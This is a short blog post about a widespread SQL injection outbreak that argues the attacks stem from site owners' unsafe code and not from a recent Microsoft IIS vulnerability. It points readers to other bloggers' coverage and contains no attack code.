My previous blog post attempted to explain SQL injection and why it’s a problem. It’s started to get media coverage now and the media is looking for a target (scapegoat). So as is often the case, someone gets wrongly blamed and right now it’s of course Microsoft.
It’s NOT Microsoft’s fault.
Here’s what’s happening, recently Microsoft announced a couple new vulnerabilities and one of these was for IIS. At the same time there’s a barrage of SQL Injection attacks being carried out and the natural assumption is “OH IT’S THOSE NEW VULNERABILITIES IN MICROSOFT”. I guess they’ll never live down sasser and nimbda. So I’m sorry, but it’s not Microsoft’s fault, it’s your code, fix your code.
Then Who’s fault is it?
It’s yours. You loaded unsafe code on your website and you didn’t fix it. Just restoring a backup of your database is not going to fix it, you’re still vulnerable.
Bill Staples has a blog posting about SQL Injection and references some good resources on his blog and also lays to rest the misconception that this is Microsoft’s fault.
Patrick S also has a great a great blog article on the current attacks on his blog at msblog.org that shows the decoded SQL code posted to sites and states that there are now 510,000 modified pages in Google as part of this same outbreak that all link back to 3 common sites. Unfortunately, he points out that it’s part of this IIS vulnerability when it’s not.
Here’s another nice blog post (although it’s SQL Injection, not a SQL Infection) that talks about this current outbreak and references Jeremiah Grossman, CTO of WhiteHat Security who was the individual that pointed out to me last year that every website is vulnerable in some fashion.
Finally, Bill Sisk also putting the whole thing to rest that it’s not Microsoft’s fault.
At any rate, this is a pretty nasty outbreak and I’d recommend you hit some of the resources linked to in my earlier SQL Injection post….